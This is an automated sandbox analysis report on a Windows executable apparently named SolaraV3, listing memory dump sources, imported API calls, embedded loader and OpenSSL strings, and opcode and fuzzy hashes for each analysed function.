                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007$A1370$B5630
                                                                                                                                                                                                                              • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                                                                                                                                                                                              • API String ID: 751195488-1596076588
                                                                                                                                                                                                                              • Opcode ID: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
                                                                                                                                                                                                                              • Instruction ID: 7d150ac9e08ff0523a85ea70c328309fc02a978adc4b27d1b0a3393935c2b04e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3051ACA1A2D74392EE14AB76E400EB96394FF44B90F408A35DE4F87BB1EE3CE5058705
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: 6bb560890a1063760ff1b2432fb7f93ef47802c76cb82598edb2bfde7034b5c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3351E736608BA186D6349F26E4581BEB7A1F798B61F004126EFDF83694DF3CD056DB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                              • Instruction ID: 7c585f7a559c15c08ef608bd35c4c35b0554370b399aff796e7cc0c8dafb2a4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7821A921B08A4AC5E7518B7AE85417DA260FF88BD0F584236DE2EC33D5DE2CD5729301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: 79a2cfecd9b28d38432b09fcbaf9c1260cb1a056df2b58ef13de02e89872d42e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E12B572E0C24B86FB205E9DD1646BD76A2FB50750F886137E699876C4DF3CE5A2CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 2eddba98cd7bd985834afa704490bf71776279aa41a4f794b1605193a7537f9c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC12A661E1C58B87FB205E19E06427D76A5FB40754FD46033D69A8BAC8DF3CE5A2CB10
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 57f1ba879e64d79a5510092389c3c74467e656c8a1e2ed55c690b7ea58e9778c
                                                                                                                                                                                                                              • Instruction ID: 128a8c90c54ff631be9942f03b8e5c3482cad9073ef72b4757f9ec0ea8ccb4c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f1ba879e64d79a5510092389c3c74467e656c8a1e2ed55c690b7ea58e9778c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4641CE22B0865A86EA14DB17A8106BEA3A5FF44BC4F844433ED4DC778ADE3DE563D340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastsetsockopt
                                                                                                                                                                                                                              • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                                                                                                                                                                                              • API String ID: 1729277954-1872632005
                                                                                                                                                                                                                              • Opcode ID: 0d2034ac39a1f015537a20df33351dbf74ae8a5fab91621d70cfd5eb938fd7c6
                                                                                                                                                                                                                              • Instruction ID: 36f6288659c32e12c046aa5fdde57abc6716c90ca763e6212d70607082aed6d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d2034ac39a1f015537a20df33351dbf74ae8a5fab91621d70cfd5eb938fd7c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06517CF1A08642C6F7249F71E805FA97360FB84744F548636E74A87AB9CF3DE5058B50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF6DC703CBB), ref: 00007FF6DC708704
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70870A
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70874C
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708830: GetEnvironmentVariableW.KERNEL32(00007FF6DC70388E), ref: 00007FF6DC708867
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DC708889
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC718238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC718251
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702810: MessageBoxW.USER32 ref: 00007FF6DC7028EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                                                                                                                                                                                              • Instruction ID: c3f9c04f3f87d20f91d7bb1442674cb1982467ea68f41431e2d5731548bdd16e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6241C211B1964A44FA25E767A8652FD52A0AF887C0F845233ED0DC77DADE3DE523D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                                                                                                                                                                                              • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                                                                              • API String ID: 1944374717-1672312481
                                                                                                                                                                                                                              • Opcode ID: d4d7f13fea52a3178e6bf5d964a5a64b36e3e8d5b416d224cb6cd8592f581902
                                                                                                                                                                                                                              • Instruction ID: 35380a969acd4e47eaaf4ad6a0c34fdc5cf80d34214723a6076cc1bf981a4ab8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4d7f13fea52a3178e6bf5d964a5a64b36e3e8d5b416d224cb6cd8592f581902
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 644160A2605B8696EB609F34D840BA82394FF48774B44CB35EA7E867F4DF2CE5458340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction ID: 7d2efa3e56b21f8a086696df1f452fb08cc197e285ca4e21af46f31a94ce5cdf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D18032A0874986EB20DF26D4413AD77B4FB55798F100136EE8D97B96DF3AE4A2D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,000001FC22CA9F78,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE8C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,000001FC22CA9F78,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE98
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction ID: b95b587e12267ab634f70504cc74e22c2a31fd8b6b762ba04f6b51265cf1f776
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E412C61B1961A42FB26CB1A982467D63A5BF48BD0F885137DD1DC7384DF3CE42B8300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6DC702D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
